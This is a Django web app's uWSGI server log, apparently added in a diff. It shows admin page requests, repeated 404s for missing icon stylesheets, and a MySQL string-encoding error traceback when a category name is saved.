/static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 179/244] 219.228.146.253 () {38 vars in 930 bytes} [Thu Jan 14 07:45:59 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 180/245] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:45:59 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 181/246] 219.228.146.146 () {40 vars in 905 bytes} [Thu Jan 14 07:46:02 2021] GET /kind-manage/ => generated 6423 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 182/247] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:46:02 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 183/248] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:46:02 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 184/249] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:46:03 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 185/250] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:46:03 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 186/251] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:46:03 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 187/252] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:46:03 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 188/253] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:46:03 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 37 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 189/254] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:46:03 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 190/255] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:46:03 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 191/256] 219.228.146.146 () {40 vars in 905 bytes} [Thu Jan 14 07:46:13 2021] GET /kind-manage/? => generated 6423 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Internal Server Error: /kind-manage/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 541, in kind_manage + models.Kind.objects.create(k_name=k_name) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1") +[pid: 2069|app: 0|req: 192/257] 219.228.146.146 () {48 vars in 987 bytes} [Thu Jan 14 07:46:13 2021] POST /kind-manage/ => generated 206836 bytes in 115 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 193/258] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:46:13 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 194/259] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:46:13 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 195/260] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:46:13 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 196/261] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:46:13 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 197/262] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:46:13 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 198/263] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:46:13 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 18 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 199/264] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:46:13 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 200/265] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:46:13 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 201/266] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:46:13 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 202/267] 219.228.146.146 () {40 vars in 903 bytes} [Thu Jan 14 07:46:17 2021] GET /admin-home/ => generated 6515 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 203/268] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:46:18 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 204/269] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:46:18 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 205/270] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:46:18 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 206/271] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:46:18 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 207/272] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:46:18 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 208/273] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:46:18 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 209/274] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:46:18 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 210/275] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:46:18 2021] GET /static/css/spinners.css => generated 3516 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 211/276] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:46:18 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 212/277] 219.228.146.146 () {40 vars in 903 bytes} [Thu Jan 14 07:46:20 2021] GET /kind-manage/ => generated 6423 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 213/278] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:46:20 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 214/279] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:46:20 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 215/280] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:46:20 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 216/281] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:46:20 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 217/282] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:46:20 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 218/283] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:46:20 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 20 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 219/284] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:46:20 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 220/285] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:46:20 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 221/286] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:46:20 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 222/287] 219.228.146.156 () {40 vars in 934 bytes} [Thu Jan 14 07:51:11 2021] GET /kind-manage/? => generated 6423 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 223/288] 219.228.146.156 () {48 vars in 1027 bytes} [Thu Jan 14 07:51:11 2021] POST /kind-manage/ => generated 27 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 2069|app: -1|req: -1/289] 219.228.146.156 () {40 vars in 930 bytes} [Thu Jan 14 07:51:11 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/290] 219.228.146.156 () {40 vars in 864 bytes} [Thu Jan 14 07:51:11 2021] GET /static/css/style.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/291] 219.228.146.156 () {40 vars in 876 bytes} [Thu Jan 14 07:51:11 2021] GET /static/css/colors/blue.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/292] 219.228.146.156 () {40 vars in 893 bytes} [Thu Jan 14 07:51:11 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/293] 219.228.146.156 () {40 vars in 905 bytes} [Thu Jan 14 07:51:11 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/294] 219.228.146.156 () {40 vars in 911 bytes} [Thu Jan 14 07:51:11 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 224/295] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 07:51:11 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 225/296] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 07:51:11 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 226/297] 219.228.146.156 () {38 vars in 889 bytes} [Thu Jan 14 07:51:11 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 227/298] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 07:51:11 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 228/299] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 07:51:11 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 229/300] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 07:51:11 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 230/301] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 07:51:11 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 231/302] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 07:51:11 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: -1|req: -1/303] 219.228.146.156 () {40 vars in 869 bytes} [Thu Jan 14 07:51:11 2021] GET /static/js/jquery.slimscroll.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: 0|req: 232/304] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 07:51:11 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: -1|req: -1/305] 219.228.146.156 () {40 vars in 845 bytes} [Thu Jan 14 07:51:11 2021] GET /static/js/waves.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/306] 219.228.146.156 () {40 vars in 857 bytes} [Thu Jan 14 07:51:11 2021] GET /static/js/sidebarmenu.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/307] 219.228.146.156 () {40 vars in 933 bytes} [Thu Jan 14 07:51:12 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/308] 219.228.146.156 () {40 vars in 855 bytes} [Thu Jan 14 07:51:12 2021] GET /static/js/custom.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/309] 219.228.146.156 () {40 vars in 929 bytes} [Thu Jan 14 07:51:12 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: 0|req: 234/310] 219.228.146.156 () {40 vars in 933 bytes} [Thu Jan 14 07:51:14 2021] GET /kind-manage/? => generated 7356 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 234/311] 219.228.146.156 () {48 vars in 1027 bytes} [Thu Jan 14 07:51:14 2021] POST /kind-manage/? => generated 27 bytes in 21 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 235/312] 219.228.146.156 () {38 vars in 885 bytes} [Thu Jan 14 07:51:14 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 236/313] 219.228.146.156 () {38 vars in 897 bytes} [Thu Jan 14 07:51:14 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 237/314] 219.228.146.156 () {38 vars in 889 bytes} [Thu Jan 14 07:51:14 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 238/315] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 07:51:14 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 239/316] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 07:51:14 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 240/317] 219.228.146.156 () {38 vars in 853 bytes} [Thu Jan 14 07:51:14 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 40 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 241/318] 219.228.146.156 () {38 vars in 929 bytes} [Thu Jan 14 07:51:14 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 243/320] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 07:51:14 2021] GET /static/css/spinners.css => generated 3516 bytes in 20 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 243/320] 219.228.146.156 () {38 vars in 819 bytes} [Thu Jan 14 07:51:14 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 244/321] 219.228.146.156 () {40 vars in 935 bytes} [Thu Jan 14 07:51:19 2021] GET /announcement/ => generated 7421 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 245/322] 219.228.146.156 () {38 vars in 885 bytes} [Thu Jan 14 07:51:19 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 